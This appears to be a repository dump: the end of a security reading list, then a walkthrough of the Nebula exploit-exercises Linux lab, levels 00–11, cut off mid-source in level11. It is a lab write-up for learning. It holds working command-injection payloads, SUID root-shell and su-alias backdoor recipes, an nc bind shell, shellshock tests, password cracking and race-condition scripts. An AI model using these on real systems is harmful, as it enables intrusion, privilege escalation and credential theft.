books](https://www.dropbox.com/sh/k3z4dm4vyyojp3o/AAAIXQuwMmNuCch_StLPUYm-a?dl=0) 83 | 84 | ## OSINT Books 85 | 86 | * [Complete Guide to Shodan](https://leanpub.com/shodan) 87 | * [A Search Engine Backed by Internet-Wide Scanning - Ariana Mirian](https://censys.io/static/censys.pdf) 88 | 89 | # Links 90 | 91 | If you want to read more, please try to visit the following urls, and search what you are interested in. 92 | 93 | 1. http://www.amazon.com/ 94 | 2. http://search.oreilly.com/openbook/ 95 | 3. http://www.slideshare.net/ 96 | 4. http://packtlib.packtpub.com/ 97 | 5. https://leanpub.com/ 98 | 6. https://en.wikibooks.org/wiki/Main_Page 99 | 7. http://gen.lib.rus.ec/ 100 | 8. http://it-ebooks.info/ 101 | 9. http://www.phrack.com/ 102 | 10. http://www.net-security.org/insecuremag.php 103 | 11. https://www.goodreads.com/ 104 | -------------------------------------------------------------------------------- /CTFS/Nebula/README.md: -------------------------------------------------------------------------------- 1 | # exploit-exercises Nebula walkthrough 2 | 3 | #### Site: 4 | https://exploit-exercises.com/nebula 5 | http://vulnhub.com/entry/exploit-exercises-nebula-v5,31/ 6 | 7 | 8 | #### About 9 | 10 | Nebula takes the participant through a variety of common (and less than common) weaknesses and vulnerabilities in Linux. It takes a look at 11 | 12 | SUID files 13 | Permissions 14 | Race conditions 15 | Shell meta-variables 16 | $PATH weaknesses 17 | Scripting language weaknesses 18 | Binary compilation failures 19 | 20 | At the end of Nebula, the user will have a reasonably thorough understanding of local attacks against Linux systems, and a cursory look at some of the remote attacks that are possible. 21 | 22 | 23 | #### Getting started 24 | 25 | ##### Levels 26 | 27 | Have a look at the levels available on the side bar, and log into the virtual machine as the username “levelXX” with a password of “levelXX” (without quotes), where XX is the level number. 28 | 29 | Some levels can be done purely remotely. 30 | 31 | 32 | ##### Getting root: 33 | 34 | In case you need root access to change stuff (such as key mappings, etc), you can do the following: 35 | 36 | Log in as the "nebula" user account with the password "nebula" (both without quotes), followed by "sudo -s" with the password "nebula". You'll then have root privileges in order to change whatever needs to be changed. 37 | 38 | ``` 39 | level19@nebula:~$ su nebula 40 | Password: 41 | nebula@nebula:/home/level19$ id 42 | uid=1000(nebula) gid=1000(nebula) groups=1000(nebula),4(adm),20(dialout),24(cdrom),46(plugdev),108(lpadmin),109(sambashare),110(admin) 43 | nebula@nebula:/home/level19$ sudo -s /bin/bash 44 | [sudo] password for nebula: 45 | root@nebula:/home/level19# id 46 | uid=0(root) gid=0(root) groups=0(root) 47 | ``` 48 | 49 | #### Workthrough 50 | 51 | * Contents: 52 | * level00 ---- find a Set User ID program 53 | * level01 ---- env hijacking 54 | * level02 ---- command injection (c) 55 | * level03 ---- scheduler 56 | * level04 ---- bypass filename limit with a symbolic 57 | * level05 ---- get ssh perms from backup files 58 | * level06 ---- crack Unix/linux os user password 59 | * level07 ---- command injection (perl) 60 | * level08 ---- packet analysis (tcpdump) 61 | * level09 ---- code injection (php) 62 | * level10 ---- time-of-use to time-of-check or TOCTOU bug 63 | * level11 ---- command injection (c) 64 | * level12 ---- command injection (lua) 65 | * level13 ---- prog debug (c) 66 | * level14 ---- decrypt 67 | * level15 ---- compile a shared library in linux 68 | * level16 ---- command injection (perl) 69 | * level17 ---- pickle bug 70 | * level18 ---- bypass login auth (c) 71 | * level19 ---- process security 72 | 73 | Linux os/shell/command/security 74 | level00/level01/level03/level04/level05/level06/level08/level10 75 | 76 | c/perl/lua/php/python 77 | level02/level07/level09/level11/level12/level13/level14/level15/level16/level17/level18/level19 78 | -------------------------------------------------------------------------------- /CTFS/Nebula/level00.md: -------------------------------------------------------------------------------- 1 | # Level00 2 | 3 | #### About 4 | 5 | This level requires you to find a Set User ID program that will run as the “flag00” account. You could also find this by carefully looking in top level directories in / for suspicious looking directories. 6 | Alternatively, look at the find man page. 7 | To access this level, log in as level00 with the password of level00. 8 | 9 | 10 | #### Source code 11 | 12 | There is no source code available for this level 13 | 14 | 15 | #### Solutions 16 | 17 | ``` 18 | 1. find / -perm -u+s -uid `id -u flag00` -type f 2>/dev/null 19 | find / -perm -4000 -uid `id -u flag00` -type f 2>/dev/null 20 | find / -type f -perm -4000 -uid `id -u flag00` -exec md5sum {} \; 2>/dev/null 21 | ----> 4d0a23fc7855e3dc128c76e18beb11b1 /bin/.../flag00 22 | ----> 4d0a23fc7855e3dc128c76e18beb11b1 /rofs/bin/.../flag00 23 | 24 | 2. /bin/.../flag00 25 | 3. getflag 26 | ``` 27 | 28 | #### SUID backdoor 29 | ``` 30 | su root 31 | cp /bin/bash /tmp/rootshell 32 | chmod u+s ~/rootshell 33 | su [someuser] 34 | /tmp/rootshell 35 | ``` 36 | ``` 37 | #include 38 | #include 39 | #include 40 | #include 41 | 42 | int main() 43 | { 44 | seteuid( 0 ); // ---- Ubuntu/... 45 | setuid( 0 ); 46 | system( "/bin/sh" ); 47 | 48 | return 0; 49 | } 50 | ``` 51 | ``` 52 | #include 53 | 54 | int main() 55 | { 56 | setresuid(0, 0, 0); 57 | execve("/bin/sh"); 58 | } 59 | ``` 60 | 61 | #### Recommend 62 | 63 | A. How to find SUID or GUID files ? 64 | 65 | find / -perm 755 # 权限为755 66 | find / -perm -4000 # 权限包含SUID即可 67 | find / -perm /4000 # 68 | 69 | rwx rwx rwx 70 | 111 111 111 71 | 72 | 73 | -perm mode 74 | mode 表示精确的权限位(可以是八进制数或符号)。如果想要使用符号位进行权限匹配,需要指定一个复杂的符号位字符串. 75 | 如果mode给的权限位不足3位,那么前面自动加0. 76 | 例如: -perm g=w,只匹配权限为0020的文件(只有用户的组具备写权限)。类似的还有 '/' 或 '-', 77 | 例如: -perm -g=w,匹配组权限可写的所有文件. 78 | 79 | 80 | File's permission bits are exactly mode (octal or symbolic). Since an exact match is required, if you want 81 | to use this form for symbolic modes, you may have to specify a rather complex mode string. For example -perm 82 | g=w will only match files which have mode 0020 (that is, ones for which group write permission is the only 83 | permission set). It is more likely that you will want to use the `/' or `-' forms, for example -perm -g=w, 84 | which matches any file with group write permission. See the EXAMPLES section for some illustrative examples. 85 | 86 | 87 | -perm -mode 88 | 所有为1的权限位必须都匹配. 89 | 文件所有设定的权限位。使用符号权限位时,需指定'u','g', 'o'. 90 | 91 | All of the permission bits mode are set for the file. Symbolic modes are accepted in this form, and this is 92 | usually the way in which would want to use them. You must specify `u', `g' or `o' if you use a symbolic 93 | mode. See the EXAMPLES section for some illustrative examples. 94 | 95 | 96 | -perm /mode 97 | 匹配任意为1的权限位. 98 | 文件任意权限位。使用符号权限位时,需指定'u','g', 'o'。如果未设定权限位,将会匹配任意文件(等效于-perm -000) 99 | Any of the permission bits mode are set for the file. Symbolic modes are accepted in this form. You must 100 | specify `u', `g' or `o' if you use a symbolic mode. See the EXAMPLES section for some illustrative examples. 101 | If no permission bits in mode are set, this test matches any file (the idea here is to be consistent with the 102 | behaviour of -perm -000). 103 | 104 | 105 | -perm +mode 106 | 已经弃用,查询某种权限位的设置,等效于 -perm /mode. 107 | Deprecated, old way of searching for files with any of the permission bits in mode set. You should use -perm 108 | /mode instead. Trying to use the `+' syntax with symbolic modes will yield surprising results. For example, 109 | `+u+x' is a valid symbolic mode (equivalent to +u,+x, i.e. 0111) and will therefore not be evaluated as -perm 110 | +mode but instead as the exact mode specifier -perm mode and so it matches files with exact permissions 0111 111 | instead of files with any execute bit set. If you found this paragraph confusing, you're not alone - just 112 | use -perm /mode. This form of the -perm test is deprecated because the POSIX specification requires the 113 | interpretation of a leading `+' as being part of a symbolic mode, and so we switched to using `/' instead. 114 | 115 | 116 | 117 | find /tmp -name core -type f -print | xargs /bin/rm -f # 如果文件名中包含core,就删除它 118 | find /tmp -name core -type f -print0 | xargs -0 /bin/rm -f # 如果文件名中包含空格,引号,换行符,也可以正确处理. 119 | find /sbin /usr/sbin -executable \! -readable -print # 寻找可执行,不可读的文件. 120 | find /tmp -type f -exec md5sum {} \; 2>/dev/null # 对每个对象执行操作 121 | 122 | #### Questions 123 | 124 | * 如何查找SUID程序? 125 | * 如何利用SUID制作后门 ? 126 | * 文件权限(挂载选项--mount/fstab) 127 | 128 | ``` 129 | root@nebula:/home/level00# mount 130 | /cow on / type overlayfs (rw) 131 | proc on /proc type proc (rw,noexec,nosuid,nodev) 132 | sysfs on /sys type sysfs (rw,noexec,nosuid,nodev) 133 | fusectl on /sys/fs/fuse/connections type fusectl (rw) 134 | udev on /dev type devtmpfs (rw,mode=0755) 135 | devpts on /dev/pts type devpts (rw,noexec,nosuid,gid=5,mode=0620) 136 | tmpfs on /run type tmpfs (rw,noexec,nosuid,size=10%,mode=0755) 137 | /dev/sr0 on /cdrom type iso9660 (ro,noatime) 138 | /dev/loop0 on /rofs type squashfs (ro,noatime) 139 | none on /sys/kernel/debug type debugfs (rw) 140 | none on /sys/kernel/security type securityfs (rw) 141 | tmpfs on /tmp type tmpfs (rw,nosuid,nodev) 142 | none on /run/lock type tmpfs (rw,noexec,nosuid,nodev,size=5242880) 143 | none on /run/shm type tmpfs (rw,nosuid,nodev) 144 | 145 | root@nebula:/home/level00# cat /etc/fstab 146 | overlayfs / overlayfs rw 0 0 147 | tmpfs /tmp tmpfs nosuid,noexec,nodev 0 0 148 | 149 | root@nebula:/home/level00# mount -o remount,noexec /tmp 150 | 151 | root@nebula:/home/level00# mount 152 | /cow on / type overlayfs (rw) 153 | proc on /proc type proc (rw,noexec,nosuid,nodev) 154 | sysfs on /sys type sysfs (rw,noexec,nosuid,nodev) 155 | fusectl on /sys/fs/fuse/connections type fusectl (rw) 156 | udev on /dev type devtmpfs (rw,mode=0755) 157 | devpts on /dev/pts type devpts (rw,noexec,nosuid,gid=5,mode=0620) 158 | tmpfs on /run type tmpfs (rw,noexec,nosuid,size=10%,mode=0755) 159 | /dev/sr0 on /cdrom type iso9660 (ro,noatime) 160 | /dev/loop0 on /rofs type squashfs (ro,noatime) 161 | none on /sys/kernel/debug type debugfs (rw) 162 | none on /sys/kernel/security type securityfs (rw) 163 | tmpfs on /tmp type tmpfs (rw,noexec,nosuid,nodev) 164 | none on /run/lock type tmpfs (rw,noexec,nosuid,nodev,size=5242880) 165 | none on /run/shm type tmpfs (rw,nosuid,nodev) 166 | 167 | root@nebula:/home/level00# ls /tmp/ 168 | root.c rootshell tmux-1001 169 | 170 | root@nebula:/home/level00# /tmp/rootshell 171 | bash: /tmp/rootshell: Permission denied 172 | ``` 173 | -------------------------------------------------------------------------------- /CTFS/Nebula/level01.md: -------------------------------------------------------------------------------- 1 | # level01 2 | 3 | #### About 4 | 5 | There is a vulnerability in the below program that allows arbitrary programs to be executed, can you find it? 6 | 7 | To do this level, log in as the level01 account with the password level01. Files for this level can be found in /home/flag01. 8 | 9 | 10 | #### Source code 11 | ``` 12 | #include 13 | #include 14 | #include 15 | #include 16 | #include 17 | 18 | int main(int argc, char **argv, char **envp) 19 | { 20 | gid_t gid; 21 | uid_t uid; 22 | gid = getegid(); 23 | uid = geteuid(); 24 | 25 | setresgid(gid, gid, gid); 26 | setresuid(uid, uid, uid); 27 | 28 | system("/usr/bin/env echo and now what?"); 29 | } 30 | ``` 31 | 32 | #### Solutions 33 | ``` 34 | cd /home/level01/ 35 | export PATH=/home/level01:$PATH 36 | ln -s /bin/getflag /home/level01/echo 37 | /home/flag01/flag01 38 | ``` 39 | 40 | #### SU backdoor 41 | ``` 42 | vim ~/.bashrc 43 | ++ alias su=/tmp/su_backdoor 44 | su 45 | Password: 46 | ``` 47 | 48 | #### Recommend 49 | 50 | env 51 | env [OPTION]... [NAME=VALUE] [COMMAND [ARGS]...] 52 | 53 | 让命令在已修改的环境变量下运行。'VARIABLE=VALUE' 设置环境变量VARIABLE的 54 | 值为VALUE. VALUE的值可以为空,将变量的值设为空,并不等同于移除声明的变 55 | 量.整个执行顺序: 从左到右,如果两次声明的是同一变量,则第一个声明会被第 56 | 二个覆盖. 57 | 如果未指定env后面的命令,将输出环境变量,类似执行了'printenv'程序. 58 | 59 | 0 ---- if no COMMAND is specified and the environment is output. 60 | 125 ---- if `env' itself fails 61 | 126 ---- if COMMAND is found but cannot be invoked 62 | 127 ---- if COMMAND cannont be found 63 | the exit status of COMMAND otherwise 64 | 65 | 66 | source 67 | source filename [arguments] 68 | 69 | source 命令,可以将加载文件中的函数,到当前shell脚本或命令行环境. 70 | source 命令,可以强制让一个脚本去影响当前的环境,export则只能影响其子环境. 71 | 例如: 72 | source ~/.bashrc 等效于 ~/.bashrc 73 | 74 | 75 | BASH shellshock 76 | 77 | 78 | CVE-2014-6271 79 | 80 | env X='() { :; }; echo "CVE-2014-6271 vulnerable"' bash -c id 81 | 82 | CVE-2014-6277 83 | 84 | will segfault if vulnerable 85 | 86 | env X='() { x() { _; }; x() { _; } < 13 | #include 14 | #include 15 | #include 16 | #include 17 | 18 | int main(int argc, char **argv, char **envp) 19 | { 20 | char *buffer; 21 | 22 | gid_t gid; 23 | uid_t uid; 24 | 25 | gid = getegid(); 26 | uid = geteuid(); 27 | 28 | setresgid(gid, gid, gid); 29 | setresuid(uid, uid, uid); 30 | 31 | buffer = NULL; 32 | 33 | asprintf(&buffer, "/bin/echo %s is cool", getenv("USER")); 34 | printf("about to call system(\"%s\")\n", buffer); 35 | 36 | system(buffer); 37 | } 38 | ``` 39 | 40 | #### Solutions 41 | ``` 42 | export USER="level02|/bin/getflag" 43 | /home/flag02/flag02 44 | about to call system("/bin/echo level02|/bin/getflag is cool") 45 | You have successfully executed getflag on a target account 46 | ``` 47 | 48 | #### Remommend 49 | 50 | Python execute os command 51 | ``` 52 | os.system(cmd) 53 | subprocess.call(cmd, shell=True) 54 | 55 | subprocess.Popen(cmd, shell=True) 56 | subprocess.communicate() 57 | ``` 58 | -------------------------------------------------------------------------------- /CTFS/Nebula/level03.md: -------------------------------------------------------------------------------- 1 | # Level03 2 | 3 | #### About 4 | 5 | Check the home directory of flag03 and take note of the files there. 6 | There is a crontab that is called every couple of minutes. 7 | 8 | To do this level, log in as the level03 account with the password level03. Files for this level can be found in /home/flag03. 9 | 10 | 11 | #### Source code 12 | 13 | There is no source code available for this level 14 | ``` 15 | cat /home/flag03/writeable.sh 16 | #!/bin/sh 17 | 18 | for i in /home/flag03/writeable.d/* ; do 19 | (ulimit -t 5; bash -x "$i") 20 | rm -f "$i" 21 | done 22 | ``` 23 | 24 | #### Solutions 25 | ``` 26 | level03@nebula:~$ cat ./test.sh 27 | #!/bin/sh 28 | 29 | /bin/getflag >> /tmp/a.out 30 | level03@nebula:~$ cat ./test1.sh 31 | #!/bin/sh 32 | 33 | nc.traditional -v -e /bin/sh -l -p 4444 34 | root@nebula:~#: ls /var/spool/cron/crontabs 35 | flag03 root 36 | ``` 37 | 38 | #### Recommend 39 | 40 | Linux 计划任务/日志/优先级 41 | 42 | * 一次性定时任务 43 | at, batch, atq, atrm 44 | atd ----> at ---- /var/spool/cron/atjobs 45 | ---- /var/spool/cron/atspool 46 | ---- /proc/loadavg 47 | ---- /var/run/utmp 48 | ---- /etc/at.allow 49 | ---- /etc/at.deny 50 | 51 | 52 | * 循环定时任务 53 | cron ---- crontab ---- /etc/crontab 54 | ---- /etc/cron.allow 55 | ---- /etc/cron.deny 56 | ---- /var/spool/cron/crontabs/* 57 | 58 | ---- /etc/rc.local 59 | ``` 60 | level03@nebula:~$ cat /etc/rc.local 61 | #!/bin/bash 62 | 63 | start-stop-daemon -b -c flag12 -S /home/flag12/flag12.lua -x `which lua` 64 | start-stop-daemon -b -c flag17 -S /home/flag17/flag17.py -x `which python` 65 | /usr/sbin/thttpd -C /home/flag07/thttpd.conf 66 | /usr/sbin/thttpd -C /home/flag16/thttpd.conf 67 | 68 | * * * * * command to be executed 69 | - - - - - 70 | | | | | | 71 | | | | | ----- Day of week (0 - 7) (Sunday=0 or 7) 72 | | | | ------- Month (1 - 12) 73 | | | --------- Day of month (1 - 31) 74 | | ----------- Hour (0 - 23) 75 | ------------- Minute (0 - 59) 76 | 77 | * ---- 代表任何时刻 78 | , ---- 1,5,10 代表第1,第5,第10, 79 | - ---- 1-24,代表1到24 80 | /n ---- 间隔为n 81 | ``` 82 | -------------------------------------------------------------------------------- /CTFS/Nebula/level04.md: -------------------------------------------------------------------------------- 1 | # Level04 2 | 3 | #### About 4 | 5 | This level requires you to read the token file, but the code restricts the files that can be read. Find a way to bypass it :) 6 | To do this level, log in as the level04 account with the password level04. Files for this level can be found in /home/flag04. 7 | 8 | 9 | #### Sources 10 | ``` 11 | #include 12 | #include 13 | #include 14 | #include 15 | #include 16 | #include 17 | 18 | int main(int argc, char **argv, char **envp) 19 | { 20 | char buf[1024]; 21 | int fd, rc; 22 | 23 | if(argc == 1) { 24 | printf("%s [file to read]\n", argv[0]); 25 | exit(EXIT_FAILURE); 26 | } 27 | 28 | if(strstr(argv[1], "token") != NULL) { 29 | printf("You may not access '%s'\n", argv[1]); 30 | exit(EXIT_FAILURE); 31 | } 32 | 33 | fd = open(argv[1], O_RDONLY); 34 | if(fd == -1) { 35 | err(EXIT_FAILURE, "Unable to open %s", argv[1]); 36 | } 37 | 38 | rc = read(fd, buf, sizeof(buf)); 39 | 40 | if(rc == -1) { 41 | err(EXIT_FAILURE, "Unable to read fd %d", fd); 42 | } 43 | 44 | write(1, buf, rc); 45 | } 46 | ``` 47 | 48 | #### Solutions 49 | 50 | ``` 51 | ln -s /home/flag04/token /tmp/target 52 | /home/flag04/flag04 /tmp/target 53 | Output: 54 | 06508b5e-8909-4f38-b630-fdb148a848a2 55 | 56 | su flag04 57 | Password: <-- 06508b5e-8909-4f38-b630-fdb148a848a2 58 | /bin/getflag 59 | ``` 60 | -------------------------------------------------------------------------------- /CTFS/Nebula/level05.md: -------------------------------------------------------------------------------- 1 | # Level05 2 | 3 | #### About 4 | 5 | Check the flag05 home directory. You are looking for weak directory permissions 6 | To do this level, log in as the level05 account with the password level05. Files for this level can be found in /home/flag05. 7 | 8 | 9 | #### Source code 10 | 11 | There is no source code available for this level 12 | 13 | 14 | #### Solutions 15 | ``` 16 | ls -all /home/flag05/ 17 | ls -all /home/flag05/.backup/ 18 | cp /home/flag05/.backup/backup-19072011.tgz /tmp/ 19 | cd /tmp 20 | tar xvf /tmp/backup-19072011.tgz 21 | ssh -i /tmp/.ssh/id_rsa flag05@127.0.0.1 22 | /bin/getflag 23 | ``` 24 | 25 | #### Recommends 26 | ssh-keygen 27 | ---- ssh-keygen -b 2048 -t rsa -C "this is my ssh key" -f ssh_key_file 28 | ---- /etc/ssh/moduli 29 | ---- /etc/ssh/ssh_config 30 | ---- /etc/ssh/sshd_config 31 | ---- /etc/ssh/ssh_host_ecdsa_key.pub 32 | ---- /etc/ssh/ssh_import_id 33 | -------------------------------------------------------------------------------- /CTFS/Nebula/level06.md: -------------------------------------------------------------------------------- 1 | # Level06 2 | 3 | #### About 4 | 5 | The flag06 account credentials came from a legacy unix system. 6 | To do this level, log in as the level06 account with the password level06. Files for this level can be found in /home/flag06. 7 | 8 | 9 | #### Source code 10 | 11 | There is no source code available for this level 12 | 13 | 14 | #### Solutions 15 | 16 | ``` 17 | sed -n '37 p' /etc/passwd > /tmp/crack_pwd 18 | flag06:ueqwOCnSGdsuM:993:993::/home/flag06:/bin/sh 19 | 20 | john crack_pwd ----> password: hello 21 | john --show crack_pwd 22 | 23 | su flag06 <---- hello 24 | /bin/getflag 25 | ``` 26 | -------------------------------------------------------------------------------- /CTFS/Nebula/level07.md: -------------------------------------------------------------------------------- 1 | # Level07 2 | 3 | #### About 4 | 5 | The flag07 user was writing their very first perl program that allowed them to ping hosts to see if they were reachable from the web server. 6 | To do this level, log in as the level07 account with the password level07. Files for this level can be found in /home/flag07. 7 | 8 | 9 | #### Source Code 10 | 11 | ``` 12 | #!/usr/bin/perl 13 | 14 | use CGI qw{param}; 15 | 16 | print "Content-type: text/html\n\n"; 17 | 18 | sub ping { 19 | $host = $_[0]; 20 | 21 | print("Ping results
");
22 | 
23 | 	@output = `ping -c 3 $host 2>&1`;
24 | 	foreach $line (@output) { print "$line"; } 
25 | 
26 | 	print("
"); 27 | 28 | } 29 | 30 | # check if Host set. if not, display normal page, etc 31 | 32 | ping(param("Host")); 33 | ``` 34 | 35 | #### Solutions 36 | 37 | http://level07-sevrer:7007/index.cgi?Host=127.0.0.1|/bin/getflag 38 | ``` 39 | cat /home/flag07/thttpd.conf ----> port=7007 40 | nc -v level07-server 7007 41 | GET /index.cgi?Host=127.0.0.1|/bin/getflag HTTP/1.0 42 | ``` 43 | 44 | -------------------------------------------------------------------------------- /CTFS/Nebula/level08.md: -------------------------------------------------------------------------------- 1 | # Level08 2 | 3 | #### About 4 | 5 | World readable files strike again. Check what that user was up to, and use it to log into flag08 account. 6 | To do this level, log in as the level08 account with the password level08. Files for this level can be found in /home/flag08. 7 | 8 | 9 | #### Source code 10 | 11 | There is no source code available for this level 12 | 13 | * analysis capture.pcap 14 | * hexdump -C dump.txt <---- http://www.asciitable.com/ 15 | 16 | ``` 17 | $ hexdump.exe -C dump.txt 18 | 00000000 ff fd 25 ff fc 25 ff fb 26 ff fd 18 ff fd 20 ff |..%..%..&..... .| 19 | 00000010 fd 23 ff fd 27 ff fd 24 ff fe 26 ff fb 18 ff fb |.#..'..$..&.....| 20 | 00000020 20 ff fb 23 ff fb 27 ff fc 24 ff fa 20 01 ff f0 | ..#..'..$.. ...| 21 | 00000030 ff fa 23 01 ff f0 ff fa 27 01 ff f0 ff fa 18 01 |..#.....'.......| 22 | 00000040 ff f0 ff fa 20 00 33 38 34 30 30 2c 33 38 34 30 |.... .38400,3840| 23 | 00000050 30 ff f0 ff fa 23 00 53 6f 64 61 43 61 6e 3a 30 |0....#.SodaCan:0| 24 | 00000060 ff f0 ff fa 27 00 00 44 49 53 50 4c 41 59 01 53 |....'..DISPLAY.S| 25 | 00000070 6f 64 61 43 61 6e 3a 30 ff f0 ff fa 18 00 78 74 |odaCan:0......xt| 26 | 00000080 65 72 6d ff f0 ff fb 03 ff fd 01 ff fd 22 ff fd |erm.........."..| 27 | 00000090 1f ff fb 05 ff fd 21 ff fd 03 ff fc 01 ff fb 22 |......!........"| 28 | 000000a0 ff fa 22 03 01 00 00 03 62 03 04 02 0f 05 00 00 |..".....b.......| 29 | 000000b0 07 62 1c 08 02 04 09 42 1a 0a 02 7f 0b 02 15 0f |.b.....B........| 30 | 000000c0 02 11 10 02 13 11 02 ff ff 12 02 ff ff ff f0 ff |................| 31 | 000000d0 fb 1f ff fa 1f 00 b1 00 31 ff f0 ff fd 05 ff fb |........1.......| 32 | 000000e0 21 ff fa 22 01 03 ff f0 ff fa 22 01 07 ff f0 ff |!.."......".....| 33 | 000000f0 fa 21 03 ff f0 ff fb 01 ff fd 00 ff fe 22 ff fd |.!..........."..| 34 | 00000100 01 ff fb 00 ff fc 22 ff fa 22 03 03 e2 03 04 82 |......".."......| 35 | 00000110 0f 07 e2 1c 08 82 04 09 c2 1a 0a 82 7f 0b 82 15 |................| 36 | 00000120 0f 82 11 10 82 13 11 82 ff ff 12 82 ff ff ff f0 |................| 37 | 00000130 0d 0a 4c 69 6e 75 78 20 32 2e 36 2e 33 38 2d 38 |..Linux 2.6.38-8| 38 | 00000140 2d 67 65 6e 65 72 69 63 2d 70 61 65 20 28 3a 3a |-generic-pae (::| 39 | 00000150 66 66 66 66 3a 31 30 2e 31 2e 31 2e 32 29 20 28 |ffff:10.1.1.2) (| 40 | 00000160 70 74 73 2f 31 30 29 0d 0a 0a 01 00 77 77 77 62 |pts/10).....wwwb| 41 | 00000170 75 67 73 20 6c 6f 67 69 6e 3a 20 6c 00 6c 65 00 |ugs login: l.le.| 42 | 00000180 65 76 00 76 65 00 65 6c 00 6c 38 00 38 0d 01 00 |ev.ve.el.l8.8...| 43 | 00000190 0d 0a 50 61 73 73 77 6f 72 64 3a 20 62 61 63 6b |..Password: back| 44 | 000001a0 64 6f 6f 72 7f 7f 7f 30 30 52 6d 38 7f 61 74 65 |door...00Rm8.ate| 45 | 000001b0 0d 00 0d 0a 01 00 0d 0a 4c 6f 67 69 6e 20 69 6e |........Login in| 46 | 000001c0 63 6f 72 72 65 63 74 0d 0a 77 77 77 62 75 67 73 |correct..wwwbugs| 47 | 000001d0 20 6c 6f 67 69 6e 3a 20 | login: | 48 | 000001d8 49 | ``` 50 | 51 | * Password: backdOORmate 52 | -------------------------------------------------------------------------------- /CTFS/Nebula/level09.md: -------------------------------------------------------------------------------- 1 | # Level09 2 | 3 | #### About 4 | 5 | There’s a C setuid wrapper for some vulnerable PHP code… 6 | To do this level, log in as the level09 account with the password level09. Files for this level can be found in /home/flag09. 7 | 8 | 9 | #### Source Code 10 | 11 | ``` 12 | ", $contents); 29 | 30 | return $contents; 31 | } 32 | 33 | $output = markup($argv[1], $argv[2]); 34 | 35 | print $output; 36 | 37 | ?> 38 | ``` 39 | 40 | #### Solutions 41 | 42 | 1. ----> test.txt 43 | [email ${${system(getflag)}}] 44 | 45 | 2. /home/flag09/flag09 test.txt 46 | 47 | 48 | #### Recommends 49 | 50 | Bash/Zsh/fish shell 51 | -------------------------------------------------------------------------------- /CTFS/Nebula/level10.md: -------------------------------------------------------------------------------- 1 | # Level10 2 | 3 | #### About 4 | 5 | The setuid binary at /home/flag10/flag10 binary will upload any file given, as long as it meets the requirements of the access() system call. 6 | To do this level, log in as the level10 account with the password level10. Files for this level can be found in /home/flag10. 7 | 8 | 9 | #### Source code 10 | 11 | ``` 12 | #include 13 | #include 14 | #include 15 | #include 16 | #include 17 | #include 18 | #include 19 | #include 20 | #include 21 | 22 | int main(int argc, char **argv) 23 | { 24 | char *file; 25 | char *host; 26 | 27 | if(argc < 3) { 28 | printf("%s file host\n\tsends file to host if you have access to it\n", argv[0]); 29 | exit(1); 30 | } 31 | 32 | file = argv[1]; 33 | host = argv[2]; 34 | 35 | if(access(argv[1], R_OK) == 0) { 36 | int fd; 37 | int ffd; 38 | int rc; 39 | struct sockaddr_in sin; 40 | char buffer[4096]; 41 | 42 | printf("Connecting to %s:18211 .. ", host); fflush(stdout); 43 | 44 | fd = socket(AF_INET, SOCK_STREAM, 0); 45 | 46 | memset(&sin, 0, sizeof(struct sockaddr_in)); 47 | sin.sin_family = AF_INET; 48 | sin.sin_addr.s_addr = inet_addr(host); 49 | sin.sin_port = htons(18211); 50 | 51 | if(connect(fd, (void *)&sin, sizeof(struct sockaddr_in)) == -1) { 52 | printf("Unable to connect to host %s\n", host); 53 | exit(EXIT_FAILURE); 54 | } 55 | 56 | #define HITHERE ".oO Oo.\n" 57 | if(write(fd, HITHERE, strlen(HITHERE)) == -1) { 58 | printf("Unable to write banner to host %s\n", host); 59 | exit(EXIT_FAILURE); 60 | } 61 | #undef HITHERE 62 | 63 | printf("Connected!\nSending file .. "); fflush(stdout); 64 | 65 | ffd = open(file, O_RDONLY); 66 | if(ffd == -1) { 67 | printf("Damn. Unable to open file\n"); 68 | exit(EXIT_FAILURE); 69 | } 70 | 71 | rc = read(ffd, buffer, sizeof(buffer)); 72 | if(rc == -1) { 73 | printf("Unable to read from file: %s\n", strerror(errno)); 74 | exit(EXIT_FAILURE); 75 | } 76 | 77 | write(fd, buffer, rc); 78 | 79 | printf("wrote file!\n"); 80 | 81 | } else { 82 | printf("You don't have access to %s\n", file); 83 | } 84 | } 85 | ``` 86 | 87 | 88 | #### solutions 89 | 90 | ``` 91 | echo aaaaaaaa>/tmp/token 92 | nc -kl 18211 93 | ``` 94 | 95 | * ---- /tmp/create_link.sh ---- 96 | ``` 97 | #!/bin/bash 98 | while true 99 | do 100 | ln -fs /tmp/token /tmp/lv10_token 101 | ln -fs /home/flag10/token /tmp/lv10_token 102 | done 103 | ``` 104 | 105 | * ----/tmp/connect.sh ---- 106 | ``` 107 | #!/bin/bash 108 | while true 109 | do 110 | /home/flag10/flag10 /tmp/lv10_token 111 | done 112 | 113 | su flag10 114 | /bin/getflag 115 | ``` 116 | 117 | 118 | #### Recommend 119 | 120 | http://cybergibbons.com/security-2/nebula-walkthrough/nebula-exploit-exercises-walkthrough-level10/ 121 | -------------------------------------------------------------------------------- /CTFS/Nebula/level11.md: -------------------------------------------------------------------------------- 1 | # level11 2 | 3 | #### About 4 | 5 | The /home/flag11/flag11 binary processes standard input and executes a shell command. 6 | There are two ways of completing this level, you may wish to do both :-) 7 | To do this level, log in as the level11 account with the password level11. Files for this level can be found in /home/flag11. 8 | 9 | 10 | #### Sources 11 | 12 | ``` 13 | #include 14 | #include 15 | #include 16 | #include 17 | #include 18 | #include 19 | #include 20 | 21 | /* 22 | * Return a random, non predictable file, and return the file descriptor for it. 23 | */ 24 | 25 | int getrand(char **path) 26 | { 27 | char *tmp; 28 | int pid; 29 | int fd; 30 | 31 | srandom(time(NULL)); 32 | 33 | tmp = getenv("TEMP"); 34 | pid = getpid(); 35 | 36 | asprintf(path, "%s/%d.%c%c%c%c%c%c", tmp, pid, 37 | 'A' + (random() % 26), '0' + (random() % 10), 38 | 'a' + (random() % 26), 'A' + (random() % 26), 39 | '0' + (random() % 10), 'a' + (random() % 26)); 40 | 41 | fd = open(*path, O_CREAT|O_RDWR, 0600); 42 | unlink(*path); 43 | return fd; 44 | } 45 | 46 | void process(char *buffer, int length) 47 | { 48 | unsigned int key; 49 | int i; 50 | 51 | key = length & 0xff; 52 | 53 | for(i = 0; i < length; i++) { 54 | buffer[i] ^= key; 55 | key -= buffer[i]; 56 | } 57 | 58 | system(buffer); 59 | } 60 | 61 | #define CL "Content-Length: " 62 | 63 | int main(int argc, char **argv) 64 | { 65 | char line[256]; 66 | char buf[1024]; 67 | char *mem; 68 | int length; 69 | int fd; 70 | char *path; 71 | 72 | if(fgets(line, sizeof(line), stdin) == NULL) { 73 | errx(1, "reading from stdin"); 74 | } 75 | 76 | if(strncmp(line, CL, strlen(CL)) != 